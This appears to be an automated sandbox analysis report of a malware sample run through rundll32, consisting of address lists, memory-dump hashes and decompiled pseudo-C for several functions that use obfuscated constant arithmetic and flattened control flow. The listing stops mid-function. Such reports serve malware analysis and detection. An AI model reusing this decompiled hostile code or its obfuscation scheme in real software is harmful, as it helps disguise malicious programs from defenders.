                                                                                                                    0x0033b531
                                                                                                                    0x00000000
                                                                                                                    0x0033b531
                                                                                                                    0x0033b4a3
                                                                                                                    0x0033b510
                                                                                                                    0x0033b515
                                                                                                                    0x0033b518
                                                                                                                    0x0033b51a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b51a
                                                                                                                    0x0033b4ab
                                                                                                                    0x0033b4df
                                                                                                                    0x0033b4e4
                                                                                                                    0x0033b4ee
                                                                                                                    0x0033b4ee
                                                                                                                    0x00000000
                                                                                                                    0x0033b4e4
                                                                                                                    0x0033b4af
                                                                                                                    0x0033b4c8
                                                                                                                    0x0033b4ce
                                                                                                                    0x0033b4d5
                                                                                                                    0x0033b4d7
                                                                                                                    0x0033b4c4
                                                                                                                    0x0033b4c4
                                                                                                                    0x00000000
                                                                                                                    0x0033b4c4
                                                                                                                    0x0033b4b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b4bf
                                                                                                                    0x00000000
                                                                                                                    0x0033b59f
                                                                                                                    0x0033b59f
                                                                                                                    0x0033b5a5
                                                                                                                    0x0033b698
                                                                                                                    0x0033b69d
                                                                                                                    0x0033b6af
                                                                                                                    0x0033b6b4
                                                                                                                    0x00000000
                                                                                                                    0x0033b6b4
                                                                                                                    0x0033b69f
                                                                                                                    0x00000000
                                                                                                                    0x0033b69f
                                                                                                                    0x0033b5ab
                                                                                                                    0x0033b5b1
                                                                                                                    0x0033b679
                                                                                                                    0x0033b67e
                                                                                                                    0x0033b68e
                                                                                                                    0x00000000
                                                                                                                    0x0033b68e
                                                                                                                    0x0033b680
                                                                                                                    0x00000000
                                                                                                                    0x0033b680
                                                                                                                    0x0033b5b7
                                                                                                                    0x0033b5bd
                                                                                                                    0x0033b658
                                                                                                                    0x0033b65d
                                                                                                                    0x0033b66f
                                                                                                                    0x00000000
                                                                                                                    0x0033b66f
                                                                                                                    0x0033b65f
                                                                                                                    0x00000000
                                                                                                                    0x0033b65f
                                                                                                                    0x0033b5c3
                                                                                                                    0x0033b5c9
                                                                                                                    0x0033b639
                                                                                                                    0x0033b63e
                                                                                                                    0x0033b64e
                                                                                                                    0x00000000
                                                                                                                    0x0033b64e
                                                                                                                    0x0033b640
                                                                                                                    0x00000000
                                                                                                                    0x0033b640
                                                                                                                    0x0033b5cb
                                                                                                                    0x0033b5d1
                                                                                                                    0x0033b61f
                                                                                                                    0x0033b62a
                                                                                                                    0x0033b632
                                                                                                                    0x00000000
                                                                                                                    0x0033b632
                                                                                                                    0x0033b5d3
                                                                                                                    0x0033b5d9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b5f9
                                                                                                                    0x0033b5fe
                                                                                                                    0x0033b601
                                                                                                                    0x0033b601

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: V$h5$kn=
                                                                                                                    • API String ID: 0-2568719763
                                                                                                                    • Opcode ID: 9e26ea5e07b4a83d7d9d6791256ce05e6ee86fa935d45bc97abc8b2566074370
                                                                                                                    • Instruction ID: 9d1a6fe82bd75ba539021b25a3ffa9433c20439b7d0fb504a5f1efb3374ab439
                                                                                                                    • Opcode Fuzzy Hash: 9e26ea5e07b4a83d7d9d6791256ce05e6ee86fa935d45bc97abc8b2566074370
                                                                                                                    • Instruction Fuzzy Hash: 58A19771108340CBD72ACF66D59652FFBE4FB85308F14892EF2968A262D7359A09CF47
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00344116() {
                                                                                                                    				char _v524;
                                                                                                                    				intOrPtr _v548;
                                                                                                                    				char _v564;
                                                                                                                    				intOrPtr _v568;
                                                                                                                    				char _v572;
                                                                                                                    				signed int _v576;
                                                                                                                    				signed int _v580;
                                                                                                                    				signed int _v584;
                                                                                                                    				signed int _v588;
                                                                                                                    				signed int _v592;
                                                                                                                    				signed int _v596;
                                                                                                                    				signed int _v600;
                                                                                                                    				signed int _v604;
                                                                                                                    				signed int _v608;
                                                                                                                    				signed int _v612;
                                                                                                                    				signed int _v616;
                                                                                                                    				signed int _v620;
                                                                                                                    				signed int _v624;
                                                                                                                    				signed int _v628;
                                                                                                                    				signed int _v632;
                                                                                                                    				signed int _v636;
                                                                                                                    				signed int _v640;
                                                                                                                    				signed int _v644;
                                                                                                                    				signed int _v648;
                                                                                                                    				signed int _v652;
                                                                                                                    				signed int _v656;
                                                                                                                    				signed int _t220;
                                                                                                                    				signed int _t222;
                                                                                                                    				void* _t224;
                                                                                                                    				void* _t226;
                                                                                                                    				void* _t227;
                                                                                                                    				signed int _t229;
                                                                                                                    				signed int _t230;
                                                                                                                    				signed int _t231;
                                                                                                                    				signed int _t232;
                                                                                                                    				signed int _t233;
                                                                                                                    				signed int _t250;
                                                                                                                    				void* _t253;
                                                                                                                    				void* _t258;
                                                                                                                    				void* _t260;
                                                                                                                    
                                                                                                                    				_v604 = 0x9b146b;
                                                                                                                    				_v604 = _v604 | 0x658b3ccc;
                                                                                                                    				_v604 = _v604 + 0xfffff1f3;
                                                                                                                    				_v604 = _v604 ^ 0x659b2e62;
                                                                                                                    				_v596 = 0xb07d39;
                                                                                                                    				_v596 = _v596 | 0x89b98cff;
                                                                                                                    				_v596 = _v596 ^ 0x89b9fdfe;
                                                                                                                    				_v584 = 0x342693;
                                                                                                                    				_v584 = _v584 ^ 0x5537c6ac;
                                                                                                                    				_v584 = _v584 ^ 0x5503e03c;
                                                                                                                    				_v628 = 0x844a73;
                                                                                                                    				_v628 = _v628 | 0x8aea995b;
                                                                                                                    				_v628 = _v628 >> 3;
                                                                                                                    				_v628 = _v628 ^ 0x3316179a;
                                                                                                                    				_v628 = _v628 ^ 0x224eeca0;
                                                                                                                    				_v644 = 0xac1c02;
                                                                                                                    				_v644 = _v644 * 0x6d;
                                                                                                                    				_t227 = 0;
                                                                                                                    				_v644 = _v644 << 0xf;
                                                                                                                    				_t253 = 0x9728f62;
                                                                                                                    				_t229 = 0x52;
                                                                                                                    				_v644 = _v644 * 0x23;
                                                                                                                    				_v644 = _v644 ^ 0xb0e78180;
                                                                                                                    				_v636 = 0x949b2b;
                                                                                                                    				_v636 = _v636 / _t229;
                                                                                                                    				_v636 = _v636 << 4;
                                                                                                                    				_t230 = 0x48;
                                                                                                                    				_v636 = _v636 / _t230;
                                                                                                                    				_v636 = _v636 ^ 0x000805f9;
                                                                                                                    				_v652 = 0x50f951;
                                                                                                                    				_v652 = _v652 << 0xe;
                                                                                                                    				_v652 = _v652 + 0xffff7357;
                                                                                                                    				_v652 = _v652 >> 5;
                                                                                                                    				_v652 = _v652 ^ 0x01f330c3;
                                                                                                                    				_v624 = 0xa7ee55;
                                                                                                                    				_v624 = _v624 + 0x328f;
                                                                                                                    				_t231 = 0x36;
                                                                                                                    				_v624 = _v624 / _t231;
                                                                                                                    				_v624 = _v624 + 0x3260;
                                                                                                                    				_v624 = _v624 ^ 0x000caec1;
                                                                                                                    				_v632 = 0x45b476;
                                                                                                                    				_v632 = _v632 << 0xf;
                                                                                                                    				_v632 = _v632 + 0x3fe9;
                                                                                                                    				_v632 = _v632 + 0xffffc242;
                                                                                                                    				_v632 = _v632 ^ 0xda30ae70;
                                                                                                                    				_v576 = 0xb3f46f;
                                                                                                                    				_v576 = _v576 >> 0xe;
                                                                                                                    				_v576 = _v576 ^ 0x000becca;
                                                                                                                    				_v640 = 0x899e10;
                                                                                                                    				_v640 = _v640 << 3;
                                                                                                                    				_v640 = _v640 | 0x15c6522a;
                                                                                                                    				_v640 = _v640 >> 0xc;
                                                                                                                    				_v640 = _v640 ^ 0x00018fe0;
                                                                                                                    				_v648 = 0x6b2405;
                                                                                                                    				_v648 = _v648 | 0xec8a856c;
                                                                                                                    				_v648 = _v648 + 0xffffe7b2;
                                                                                                                    				_v648 = _v648 >> 0xd;
                                                                                                                    				_v648 = _v648 ^ 0x000a0717;
                                                                                                                    				_v608 = 0xd62f5d;
                                                                                                                    				_v608 = _v608 + 0xffffa804;
                                                                                                                    				_v608 = _v608 >> 1;
                                                                                                                    				_v608 = _v608 ^ 0x00686b18;
                                                                                                                    				_v580 = 0x2fce72;
                                                                                                                    				_t232 = 6;
                                                                                                                    				_v580 = _v580 / _t232;
                                                                                                                    				_v580 = _v580 ^ 0x000627ef;
                                                                                                                    				_v612 = 0xa7d19a;
                                                                                                                    				_v612 = _v612 ^ 0x125f9685;
                                                                                                                    				_v612 = _v612 ^ 0x35fdcbd7;
                                                                                                                    				_v612 = _v612 ^ 0x270c67d8;
                                                                                                                    				_v656 = 0x784491;
                                                                                                                    				_v656 = _v656 >> 9;
                                                                                                                    				_v656 = _v656 | 0xfbff7fff;
                                                                                                                    				_v656 = _v656 ^ 0xfbf9abc9;
                                                                                                                    				_v616 = 0xc21bdd;
                                                                                                                    				_t233 = 0x58;
                                                                                                                    				_v616 = _v616 / _t233;
                                                                                                                    				_v616 = _v616 | 0xde7eb344;
                                                                                                                    				_v616 = _v616 ^ 0xde714edb;
                                                                                                                    				_v620 = 0x22ba29;
                                                                                                                    				_v620 = _v620 + 0xc334;
                                                                                                                    				_v620 = _v620 ^ 0x41b5236d;
                                                                                                                    				_v620 = _v620 ^ 0x4193ad78;
                                                                                                                    				_v588 = 0x61092c;
                                                                                                                    				_v588 = _v588 | 0xfbe761ce;
                                                                                                                    				_v588 = _v588 ^ 0xfbe7142a;
                                                                                                                    				_v600 = 0xd9609d;
                                                                                                                    				_v600 = _v600 | 0x95d54fcb;
                                                                                                                    				_v600 = _v600 ^ 0x95d705b7;
                                                                                                                    				_v592 = 0xc80f6b;
                                                                                                                    				_t234 = 0x42;
                                                                                                                    				_t252 = _v600;
                                                                                                                    				_v592 = _v592 / _t234;
                                                                                                                    				_v592 = _v592 ^ 0x0000156e;
                                                                                                                    				do {
                                                                                                                    					while(_t253 != 0x25f6a69) {
                                                                                                                    						if(_t253 == 0x9728f62) {
                                                                                                                    							_t253 = 0xea70970;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t253 == 0x9c0fe90) {
                                                                                                                    								_t250 = _v632;
                                                                                                                    								_t220 = E00338F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
                                                                                                                    								_t252 = _t220;
                                                                                                                    								_t260 = _t260 + 0x28;
                                                                                                                    								__eflags = _t220 - 0xffffffff;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_t253 = 0xaccbeb9;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t253 == 0xaccbeb9) {
                                                                                                                    									_t222 = E00339350( &_v564, _t252, _v608, _v580, _t234, _v612);
                                                                                                                    									asm("sbb esi, esi");
                                                                                                                    									_t250 = _v616;
                                                                                                                    									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
                                                                                                                    									_t234 = _v656;
                                                                                                                    									E00341E67(_v656, _t250, _v620, _v588, _t252);
                                                                                                                    									_t260 = _t260 + 0x20;
                                                                                                                    									goto L14;
                                                                                                                    								} else {
                                                                                                                    									if(_t253 == 0xdba0984) {
                                                                                                                    										_t224 = E0034ABD1();
                                                                                                                    										_t258 = _v572 - _v548;
                                                                                                                    										asm("sbb ecx, [esp+0x84]");
                                                                                                                    										__eflags = _v568 - _t250;
                                                                                                                    										if(__eflags >= 0) {
                                                                                                                    											if(__eflags > 0) {
                                                                                                                    												L19:
                                                                                                                    												_t227 = 1;
                                                                                                                    												__eflags = 1;
                                                                                                                    											} else {
                                                                                                                    												__eflags = _t258 - _t224;
                                                                                                                    												if(_t258 >= _t224) {
                                                                                                                    													goto L19;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										_t268 = _t253 - 0xea70970;
                                                                                                                    										if(_t253 != 0xea70970) {
                                                                                                                    											goto L14;
                                                                                                                    										} else {
                                                                                                                    											_t250 = _v644;
                                                                                                                    											_t234 = _v628;
                                                                                                                    											_t226 = E0034DA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
                                                                                                                    											_t260 = _t260 + 0x10;
                                                                                                                    											if(_t226 != 0) {
                                                                                                                    												_t253 = 0x9c0fe90;
                                                                                                                    												continue;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L20:
                                                                                                                    						return _t227;
                                                                                                                    					}
                                                                                                                    					E0034C1EC(_v600, _v592,  &_v572);
                                                                                                                    					_pop(_t234);
                                                                                                                    					_t253 = 0xdba0984;
                                                                                                                    					L14:
                                                                                                                    					__eflags = _t253 - 0x15a60c5;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L20;
                                                                                                                    			}

                                                                                                                    0x0034441f
                                                                                                                    0x00344430
                                                                                                                    0x00344434
                                                                                                                    0x00344438
                                                                                                                    0x0034443d
                                                                                                                    0x00344442
                                                                                                                    0x00344448
                                                                                                                    0x00000000
                                                                                                                    0x00344448
                                                                                                                    0x00344442
                                                                                                                    0x00344419
                                                                                                                    0x0034440d
                                                                                                                    0x00344405
                                                                                                                    0x003443f9
                                                                                                                    0x00344535
                                                                                                                    0x0034453e
                                                                                                                    0x0034453e
                                                                                                                    0x003444f1
                                                                                                                    0x003444f6
                                                                                                                    0x003444f7
                                                                                                                    0x003444fc
                                                                                                                    0x003444fc
                                                                                                                    0x003444fc
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,a$`2$?
                                                                                                                    • API String ID: 0-2087061617
                                                                                                                    • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                    • Instruction ID: 895d868afc15bc82458fb29ca31d0940aab428ec4a2fda353112d943651e65be
                                                                                                                    • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                    • Instruction Fuzzy Hash: 96A121725083419FC359CF65C88A50BFBF2BBC5718F018A2DF5999A260D3B59A098F46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003359F2() {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				intOrPtr _v1044;
                                                                                                                    				intOrPtr _v1048;
                                                                                                                    				intOrPtr _v1052;
                                                                                                                    				intOrPtr _v1056;
                                                                                                                    				signed int _v1060;
                                                                                                                    				signed int _v1064;
                                                                                                                    				signed int _v1068;
                                                                                                                    				signed int _v1072;
                                                                                                                    				signed int _v1076;
                                                                                                                    				signed int _v1080;
                                                                                                                    				signed int _v1084;
                                                                                                                    				signed int _v1088;
                                                                                                                    				signed int _v1092;
                                                                                                                    				signed int _v1096;
                                                                                                                    				signed int _v1100;
                                                                                                                    				signed int _v1104;
                                                                                                                    				signed int _v1108;
                                                                                                                    				signed int _v1112;
                                                                                                                    				signed int _v1116;
                                                                                                                    				signed int _v1120;
                                                                                                                    				signed int _v1124;
                                                                                                                    				signed int _v1128;
                                                                                                                    				signed int _v1132;
                                                                                                                    				signed int _v1136;
                                                                                                                    				signed int _v1140;
                                                                                                                    				void* _t202;
                                                                                                                    				void* _t208;
                                                                                                                    				intOrPtr _t209;
                                                                                                                    				void* _t214;
                                                                                                                    				void* _t222;
                                                                                                                    				intOrPtr _t237;
                                                                                                                    				intOrPtr _t240;
                                                                                                                    				signed int _t241;
                                                                                                                    				signed int _t242;
                                                                                                                    				signed int _t243;
                                                                                                                    				signed int _t244;
                                                                                                                    				signed int* _t247;
                                                                                                                    
                                                                                                                    				_t247 =  &_v1140;
                                                                                                                    				_v1056 = 0x36f622;
                                                                                                                    				_v1052 = 0x8ed67e;
                                                                                                                    				_t214 = 0xf737bb2;
                                                                                                                    				_v1048 = 0x93fb3c;
                                                                                                                    				_t240 = 0;
                                                                                                                    				_v1044 = 0;
                                                                                                                    				_v1076 = 0x48eb17;
                                                                                                                    				_v1076 = _v1076 + 0x189d;
                                                                                                                    				_v1076 = _v1076 ^ 0x00442401;
                                                                                                                    				_v1100 = 0xa45863;
                                                                                                                    				_v1100 = _v1100 << 2;
                                                                                                                    				_t241 = 0x1d;
                                                                                                                    				_v1100 = _v1100 * 0x7c;
                                                                                                                    				_v1100 = _v1100 ^ 0x3e6538f4;
                                                                                                                    				_v1108 = 0x56f1ad;
                                                                                                                    				_v1108 = _v1108 | 0xbff0a597;
                                                                                                                    				_v1108 = _v1108 / _t241;
                                                                                                                    				_v1108 = _v1108 ^ 0x06946226;
                                                                                                                    				_v1132 = 0xc3fd0a;
                                                                                                                    				_v1132 = _v1132 << 8;
                                                                                                                    				_v1132 = _v1132 + 0xffff9bc2;
                                                                                                                    				_t242 = 0x18;
                                                                                                                    				_v1132 = _v1132 / _t242;
                                                                                                                    				_v1132 = _v1132 ^ 0x0821d39f;
                                                                                                                    				_v1068 = 0xc66dea;
                                                                                                                    				_v1068 = _v1068 + 0xffff0514;
                                                                                                                    				_v1068 = _v1068 ^ 0x00c0919e;
                                                                                                                    				_v1136 = 0x72811d;
                                                                                                                    				_v1136 = _v1136 ^ 0x5ea2c622;
                                                                                                                    				_t243 = 0x5d;
                                                                                                                    				_v1136 = _v1136 * 0x4f;
                                                                                                                    				_v1136 = _v1136 * 0x41;
                                                                                                                    				_v1136 = _v1136 ^ 0xd3c4c324;
                                                                                                                    				_v1096 = 0x2e25e6;
                                                                                                                    				_v1096 = _v1096 ^ 0xbdbebaf9;
                                                                                                                    				_v1096 = _v1096 ^ 0xbd932287;
                                                                                                                    				_v1060 = 0x3d42d8;
                                                                                                                    				_v1060 = _v1060 << 6;
                                                                                                                    				_v1060 = _v1060 ^ 0x0f5887f2;
                                                                                                                    				_v1116 = 0xec9c1f;
                                                                                                                    				_v1116 = _v1116 >> 1;
                                                                                                                    				_v1116 = _v1116 + 0xcef9;
                                                                                                                    				_v1116 = _v1116 ^ 0x0078140d;
                                                                                                                    				_v1084 = 0xf6a299;
                                                                                                                    				_v1084 = _v1084 >> 9;
                                                                                                                    				_v1084 = _v1084 ^ 0x00023821;
                                                                                                                    				_v1124 = 0xf6e97d;
                                                                                                                    				_v1124 = _v1124 + 0xffff8c4c;
                                                                                                                    				_v1124 = _v1124 / _t243;
                                                                                                                    				_v1124 = _v1124 | 0xda1c672f;
                                                                                                                    				_v1124 = _v1124 ^ 0xda1e012d;
                                                                                                                    				_v1120 = 0x9bdb66;
                                                                                                                    				_v1120 = _v1120 * 0x47;
                                                                                                                    				_v1120 = _v1120 + 0xdb13;
                                                                                                                    				_v1120 = _v1120 * 0x64;
                                                                                                                    				_v1120 = _v1120 ^ 0xe2e3c71f;
                                                                                                                    				_v1112 = 0x9fec0e;
                                                                                                                    				_v1112 = _v1112 << 0xc;
                                                                                                                    				_v1112 = _v1112 | 0xd7512eb2;
                                                                                                                    				_v1112 = _v1112 ^ 0xffdc645c;
                                                                                                                    				_v1104 = 0xc74eee;
                                                                                                                    				_v1104 = _v1104 + 0x930c;
                                                                                                                    				_v1104 = _v1104 ^ 0x28280d38;
                                                                                                                    				_v1104 = _v1104 ^ 0x28ef0d26;
                                                                                                                    				_v1064 = 0xc36095;
                                                                                                                    				_v1064 = _v1064 | 0x2d8f7273;
                                                                                                                    				_v1064 = _v1064 ^ 0x2dcb1501;
                                                                                                                    				_v1140 = 0xa3c477;
                                                                                                                    				_v1140 = _v1140 ^ 0xb16da3ec;
                                                                                                                    				_v1140 = _v1140 ^ 0x8917fdcb;
                                                                                                                    				_v1140 = _v1140 >> 0xe;
                                                                                                                    				_v1140 = _v1140 ^ 0x000e0fa0;
                                                                                                                    				_v1128 = 0x58136;
                                                                                                                    				_v1128 = _v1128 << 6;
                                                                                                                    				_v1128 = _v1128 << 0x10;
                                                                                                                    				_v1128 = _v1128 + 0xffffe729;
                                                                                                                    				_v1128 = _v1128 ^ 0x4d79f308;
                                                                                                                    				_v1072 = 0x735c84;
                                                                                                                    				_t244 = 0x7f;
                                                                                                                    				_v1072 = _v1072 / _t244;
                                                                                                                    				_v1072 = _v1072 ^ 0x0002b970;
                                                                                                                    				_v1080 = 0x91f75b;
                                                                                                                    				_v1080 = _v1080 + 0xffffc39e;
                                                                                                                    				_v1080 = _v1080 ^ 0x009f463e;
                                                                                                                    				_v1088 = 0xdf4dcf;
                                                                                                                    				_v1088 = _v1088 | 0x05792173;
                                                                                                                    				_v1088 = _v1088 ^ 0x05f69aec;
                                                                                                                    				_v1092 = 0xf44447;
                                                                                                                    				_v1092 = _v1092 * 0x78;
                                                                                                                    				_v1092 = _v1092 ^ 0x728504a1;
                                                                                                                    				do {
                                                                                                                    					while(_t214 != 0x89b0ee) {
                                                                                                                    						if(_t214 == 0x291094f) {
                                                                                                                    							E00333C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
                                                                                                                    						} else {
                                                                                                                    							if(_t214 == 0x6a25a64) {
                                                                                                                    								E0034DA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
                                                                                                                    								_t247 =  &(_t247[4]);
                                                                                                                    								_t214 = 0xe0c4196;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t214 == 0xe0c4196) {
                                                                                                                    									_push(_v1096);
                                                                                                                    									_push(_v1136);
                                                                                                                    									_t208 = E0034DCF7(_v1068, 0x331000, __eflags);
                                                                                                                    									_pop(_t222);
                                                                                                                    									_t209 =  *0x353e10; // 0x0
                                                                                                                    									_t237 =  *0x353e10; // 0x0
                                                                                                                    									E003347CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
                                                                                                                    									E0033A8B0(_v1112, _t208, _v1104);
                                                                                                                    									_t247 =  &(_t247[9]);
                                                                                                                    									_t214 = 0x89b0ee;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									if(_t214 != 0xf737bb2) {
                                                                                                                    										goto L10;
                                                                                                                    									} else {
                                                                                                                    										_t214 = 0x6a25a64;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L13:
                                                                                                                    						return _t240;
                                                                                                                    					}
                                                                                                                    					_push(_v1128);
                                                                                                                    					_push( &_v1040);
                                                                                                                    					_push(_v1140);
                                                                                                                    					_t202 = E003513AD(_v1064,  &_v520, __eflags);
                                                                                                                    					_t247 =  &(_t247[3]);
                                                                                                                    					__eflags = _t202;
                                                                                                                    					_t240 =  !=  ? 1 : _t240;
                                                                                                                    					_t214 = 0x291094f;
                                                                                                                    					L10:
                                                                                                                    					__eflags = _t214 - 0xb653a05;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L13;
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: &($&($%.
                                                                                                                    • API String ID: 0-466442461
                                                                                                                    • Opcode ID: dbfe62948f5ff092897e2dd0e5ad03a476480ab69c1720ca985fbd65be029e75
                                                                                                                    • Instruction ID: 96406c8f15c5d5f64d288d0fedd4dafc3ce68e6cfea7475e7fdb1155ad965516
                                                                                                                    • Opcode Fuzzy Hash: dbfe62948f5ff092897e2dd0e5ad03a476480ab69c1720ca985fbd65be029e75
                                                                                                                    • Instruction Fuzzy Hash: 82A120B11083819FC759CF26C58941BFBF1FBC4758F109A1DF5A69A220D7B58A09CF46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E003513AD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                    				void* _t197;
                                                                                                                    				signed int _t222;
                                                                                                                    				signed int _t226;
                                                                                                                    				void* _t236;
                                                                                                                    				void* _t245;
                                                                                                                    				void* _t246;
                                                                                                                    
                                                                                                                    				_t245 = _t246 - 0x6c;
                                                                                                                    				_push( *((intOrPtr*)(_t245 + 0x7c)));
                                                                                                                    				_push( *((intOrPtr*)(_t245 + 0x78)));
                                                                                                                    				_push( *((intOrPtr*)(_t245 + 0x74)));
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t197);
                                                                                                                    				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
                                                                                                                    				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
                                                                                                                    				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
                                                                                                                    				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
                                                                                                                    				 *(_t245 + 0x38) = 0xf8747;
                                                                                                                    				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
                                                                                                                    				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
                                                                                                                    				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
                                                                                                                    				 *(_t245 + 0x4c) = 0x1e90b9;
                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
                                                                                                                    				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
                                                                                                                    				 *(_t245 + 0x54) = 0x94d35;
                                                                                                                    				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
                                                                                                                    				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
                                                                                                                    				 *(_t245 + 0x40) = 0x2ce8ae;
                                                                                                                    				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
                                                                                                                    				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
                                                                                                                    				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
                                                                                                                    				 *(_t245 + 0x58) = 0x43e6f3;
                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
                                                                                                                    				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
                                                                                                                    				 *(_t245 + 0x24) = 0x72d00d;
                                                                                                                    				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
                                                                                                                    				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
                                                                                                                    				 *(_t245 + 0x34) = 0x43d743;
                                                                                                                    				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
                                                                                                                    				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
                                                                                                                    				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
                                                                                                                    				 *(_t245 + 0x2c) = 0xa6821;
                                                                                                                    				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
                                                                                                                    				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
                                                                                                                    				 *(_t245 + 0x60) = 0x210575;
                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
                                                                                                                    				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
                                                                                                                    				 *(_t245 + 0x44) = 0xde4c18;
                                                                                                                    				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
                                                                                                                    				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
